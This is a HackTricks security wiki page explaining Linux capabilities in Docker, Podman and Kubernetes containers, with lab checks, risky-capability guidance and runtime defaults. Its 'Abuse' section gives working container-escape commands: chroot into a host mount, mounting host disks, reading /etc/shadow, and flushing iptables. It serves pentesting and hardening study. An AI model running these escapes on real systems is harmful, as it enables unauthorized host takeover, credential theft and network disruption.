capabilities.md (13670B)
1 --- 2 title: "Linux Capabilities In Containers" 3 section: "Linux" 4 sectionSlug: "linux-hardening" 5 sourcePath: "src/linux-hardening/containers-namespaces/container-security/protections/capabilities.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/linux-hardening/containers-namespaces/container-security/protections/capabilities.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Linux Capabilities In Containers 14 15 ## Overview 16 17 Linux capabilities are one of the most important pieces of container security because they answer a subtle but fundamental question: **what does "root" really mean inside a container?** On a normal Linux system, UID 0 historically implied a very broad privilege set. In modern kernels, that privilege is decomposed into smaller units called capabilities. A process may run as root and still lack many powerful operations if the relevant capabilities have been removed. <sup>[[1]](#references)</sup> 18 19 Containers depend on this distinction heavily. Many workloads are still launched as UID 0 inside the container for compatibility or simplicity reasons. Without capability dropping, that would be far too dangerous. With capability dropping, a containerized root process can still perform many ordinary in-container tasks while being denied more sensitive kernel operations. That is why a container shell that says `uid=0(root)` does not automatically mean "host root" or even "broad kernel privilege". The capability sets decide how much that root identity is actually worth. 20 21 For the full Linux capability reference and many abuse examples, see: 22 23 [Linux Capabilities](/hacktricks/linux-hardening/interesting-files-permissions/linux-capabilities) 24 25 ## Operation 26 27 Capabilities are tracked in several sets, including permitted, effective, inheritable, ambient, and bounding sets. For many container assessments, the exact kernel semantics of each set are less immediately important than the final practical question: **which privileged operations can this process successfully perform right now, and which future privilege gains are still possible?** <sup>[[1]](#references)</sup> 28 29 The reason this matters is that many breakout techniques are really capability problems disguised as container problems. A workload with `CAP_SYS_ADMIN` can reach a huge amount of kernel functionality that a normal container root process should not touch. A workload with `CAP_NET_ADMIN` becomes much more dangerous if it also shares the host network namespace. A workload with `CAP_SYS_PTRACE` becomes much more interesting if it can see host processes through host PID sharing. In Docker or Podman that may appear as `--pid=host`; in Kubernetes it usually appears as `hostPID: true`. 30 31 In other words, the capability set cannot be evaluated in isolation. It has to be read together with namespaces, seccomp, and MAC policy. 32 33 ## Lab 34 35 A very direct way to inspect capabilities inside a container is: 36 37 ```bash 38 docker run --rm -it debian:stable-slim bash 39 apt-get update && apt-get install -y libcap2-bin 40 capsh --print 41 ``` 42 43 You can also compare a more restrictive container with one that has all capabilities added: 44 45 ```bash 46 docker run --rm debian:stable-slim sh -c 'grep CapEff /proc/self/status' 47 docker run --rm --cap-add=ALL debian:stable-slim sh -c 'grep CapEff /proc/self/status' 48 ``` 49 50 To see the effect of a narrow addition, try dropping everything and adding back only one capability: 51 52 ```bash 53 docker run --rm --cap-drop=ALL --cap-add=NET_BIND_SERVICE debian:stable-slim sh -c 'grep CapEff /proc/self/status' 54 ``` 55 56 These small experiments help show that a runtime is not simply toggling a boolean called "privileged". It is shaping the actual privilege surface available to the process. 57 58 ## High-Risk Capabilities 59 60 Although many capabilities can matter depending on the target, a few are repeatedly relevant in container escape analysis. 61 62 **`CAP_SYS_ADMIN`** is the one defenders should treat with the most suspicion. It is often described as "the new root" because it unlocks an enormous amount of functionality, including mount-related operations, namespace-sensitive behavior, and many kernel paths that should never be casually exposed to containers. If a container has `CAP_SYS_ADMIN`, weak seccomp, and no strong MAC confinement, many classic breakout paths become much more realistic. 63 64 **`CAP_SYS_PTRACE`** matters when process visibility exists, especially if the PID namespace is shared with the host or with interesting neighboring workloads. It can turn visibility into tampering. 65 66 **`CAP_NET_ADMIN`** and **`CAP_NET_RAW`** matter in network-focused environments. On an isolated bridge network they may already be risky; on a shared host network namespace they are much worse because the workload may be able to reconfigure host networking, sniff, spoof, or interfere with local traffic flows. 67 68 **`CAP_SYS_MODULE`** is usually catastrophic in a rootful environment because loading kernel modules is effectively host-kernel control. It should almost never appear in a general-purpose container workload. 69 70 ## Runtime Usage 71 72 Docker, Podman, containerd-based stacks, and CRI-O all use capability controls, but the defaults and management interfaces differ. Docker exposes them directly through flags such as `--cap-drop` and `--cap-add`. Podman exposes similar controls and commonly combines them with rootless execution as an additional safety layer. Kubernetes surfaces capability additions and drops through the Pod or container `securityContext`; lower-level runtimes express the resulting sets in the OCI runtime configuration. System-container environments such as LXC and Incus also rely on capability control, but their broader host integration can tempt operators to relax defaults more aggressively than they would for an application container. <sup>[[2]](#references)</sup> <sup>[[3]](#references)</sup> <sup>[[4]](#references)</sup> <sup>[[5]](#references)</sup> <sup>[[6]](#references)</sup> 73 74 The same principle holds across all of them: a capability that is technically possible to grant is not necessarily one that should be granted. Many real-world incidents begin when an operator adds a capability simply because a workload failed under a stricter configuration and the team needed a quick fix. 75 76 ## Misconfigurations 77 78 The most obvious mistake is **`--cap-add=ALL`** in Docker/Podman-style CLIs, but it is not the only one. In practice, a more common problem is granting one or two extremely powerful capabilities, especially `CAP_SYS_ADMIN`, to "make the application work" without also understanding the namespace, seccomp, and mount implications. Another common failure mode is combining extra capabilities with host namespace sharing. In Docker or Podman this may appear as `--pid=host`, `--network=host`, or `--userns=host`; in Kubernetes the equivalent exposure usually appears through workload settings such as `hostPID: true` or `hostNetwork: true`. Each of those combinations changes what the capability can actually affect. 79 80 It is also common to see administrators believe that because a workload is not fully `--privileged`, it is still meaningfully constrained. Sometimes that is true, but sometimes the effective posture is already close enough to privileged that the distinction stops mattering operationally. 81 82 ## Abuse 83 84 The first practical step is to enumerate the effective capability set and immediately test the capability-specific actions that would matter for escape or host information access: 85 86 ```bash 87 capsh --print 88 grep '^Cap' /proc/self/status 89 ``` 90 91 If `CAP_SYS_ADMIN` is present, test mount-based abuse and host filesystem access first, because this is one of the most common breakout enablers: 92 93 ```bash 94 mkdir -p /tmp/m 95 mount -t tmpfs tmpfs /tmp/m 2>/dev/null && echo "tmpfs mount works" 96 mount | head 97 find / -maxdepth 3 -name docker.sock -o -name containerd.sock -o -name crio.sock 2>/dev/null 98 ``` 99 100 If `CAP_SYS_PTRACE` is present and the container can see interesting processes, verify whether the capability can be turned into process inspection: 101 102 ```bash 103 capsh --print | grep cap_sys_ptrace 104 ps -ef | head 105 for p in 1 $(pgrep -n sshd 2>/dev/null); do cat /proc/$p/cmdline 2>/dev/null; echo; done 106 ``` 107 108 If `CAP_NET_ADMIN` or `CAP_NET_RAW` is present, test whether the workload can manipulate the visible network stack or at least gather useful network intelligence: 109 110 ```bash 111 capsh --print | grep -E 'cap_net_admin|cap_net_raw' 112 ip addr 113 ip route 114 iptables -S 2>/dev/null || nft list ruleset 2>/dev/null 115 ``` 116 117 When a capability test succeeds, combine it with the namespace situation. A capability that looks merely risky in an isolated namespace can become an escape or host-recon primitive immediately when the container also shares host PID, host network, or host mounts. 118 119 ### Full Example: `CAP_SYS_ADMIN` + Host Mount = Host Escape 120 121 If the container has `CAP_SYS_ADMIN` and a writable bind mount of the host filesystem such as `/host`, the escape path is often straightforward: 122 123 ```bash 124 capsh --print | grep cap_sys_admin 125 mount | grep ' /host ' 126 ls -la /host 127 chroot /host /bin/bash 128 ``` 129 130 If `chroot` succeeds, commands now execute in the host root filesystem context: 131 132 ```bash 133 id 134 hostname 135 cat /etc/shadow | head 136 ``` 137 138 If `chroot` is unavailable, the same result can often be achieved by calling the binary through the mounted tree: 139 140 ```bash 141 /host/bin/bash -p 142 export PATH=/host/usr/sbin:/host/usr/bin:/host/sbin:/host/bin:$PATH 143 ``` 144 145 ### Full Example: `CAP_SYS_ADMIN` + Device Access 146 147 If a block device from the host is exposed, `CAP_SYS_ADMIN` can turn it into direct host filesystem access: 148 149 ```bash 150 ls -l /dev/sd* /dev/vd* /dev/nvme* 2>/dev/null 151 mkdir -p /mnt/hostdisk 152 mount /dev/sda1 /mnt/hostdisk 2>/dev/null || mount /dev/vda1 /mnt/hostdisk 2>/dev/null 153 ls -la /mnt/hostdisk 154 chroot /mnt/hostdisk /bin/bash 2>/dev/null 155 ``` 156 157 ### Full Example: `CAP_NET_ADMIN` + Host Networking 158 159 This combination does not always produce host root directly, but it can fully reconfigure the host network stack: 160 161 ```bash 162 capsh --print | grep cap_net_admin 163 ip addr 164 ip route 165 iptables -S 2>/dev/null || nft list ruleset 2>/dev/null 166 ip link set lo down 2>/dev/null 167 iptables -F 2>/dev/null 168 ``` 169 170 That can enable denial of service, traffic interception, or access to services that were previously filtered. 171 172 ## Checks 173 174 The goal of the capability checks is not only to dump raw values but to understand whether the process has enough privilege to make its current namespace and mount situation dangerous. 175 176 ```bash 177 capsh --print # Human-readable capability sets and securebits 178 grep '^Cap' /proc/self/status # Raw kernel capability bitmasks 179 ``` 180 181 What is interesting here: 182 183 - `capsh --print` is the easiest way to spot high-risk capabilities such as `cap_sys_admin`, `cap_sys_ptrace`, `cap_net_admin`, or `cap_sys_module`. 184 - The `CapEff` line in `/proc/self/status` tells you what is actually effective now, not just what might be available in other sets. 185 - A capability dump becomes much more important if the container also shares host PID, network, or user namespaces, or has writable host mounts. 186 187 After collecting the raw capability information, the next step is interpretation. Ask whether the process is root, whether user namespaces are active, whether host namespaces are shared, whether seccomp is enforcing, and whether AppArmor or SELinux still restricts the process. A capability set by itself is only part of the story, but it is often the part that explains why one container breakout works and another fails with the same apparent starting point. 188 189 ## Runtime Defaults 190 191 | Runtime / platform | Default state | Default behavior | Common manual weakening | 192 | --- | --- | --- | --- | 193 | Docker Engine | Reduced capability set by default | Docker keeps a default allowlist of capabilities and drops the rest | `--cap-add=<cap>`, `--cap-drop=<cap>`, `--cap-add=ALL`, `--privileged` | 194 | Podman | Reduced capability set by default | Podman containers are unprivileged by default and use a reduced capability model | `--cap-add=<cap>`, `--cap-drop=<cap>`, `--privileged` | 195 | Kubernetes | Inherits runtime defaults unless changed | If no `securityContext.capabilities` are specified, the container gets the default capability set from the runtime | `securityContext.capabilities.add`, failing to `drop: [\"ALL\"]`, `privileged: true` | 196 | containerd / CRI-O under Kubernetes | Usually runtime default | The effective set depends on the runtime plus the Pod spec | same as Kubernetes row; direct OCI/CRI configuration can also add capabilities explicitly | 197 198 For Kubernetes, the important point is that the API does not define one universal default capability set. If the Pod does not add or drop capabilities, the workload inherits the runtime default for that node. 199 200 ## References 201 202 - [1] [capabilities(7) - Linux manual page](https://man7.org/linux/man-pages/man7/capabilities.7.html) 203 - [2] [Open Container Initiative - Linux container configuration](https://github.com/opencontainers/runtime-spec/blob/main/config-linux.md#process) 204 - [3] [Docker Docs - Runtime privilege and Linux capabilities](https://docs.docker.com/engine/containers/run/#runtime-privilege-and-linux-capabilities) 205 - [4] [Kubernetes Documentation - Set capabilities for a container](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/#set-capabilities-for-a-container) 206 - [5] [Podman documentation - `--cap-add` and `--cap-drop`](https://docs.podman.io/en/latest/markdown/podman-run.1.html#cap-add-capability) 207 - [6] [Incus documentation - Security](https://linuxcontainers.org/incus/docs/main/explanation/security/)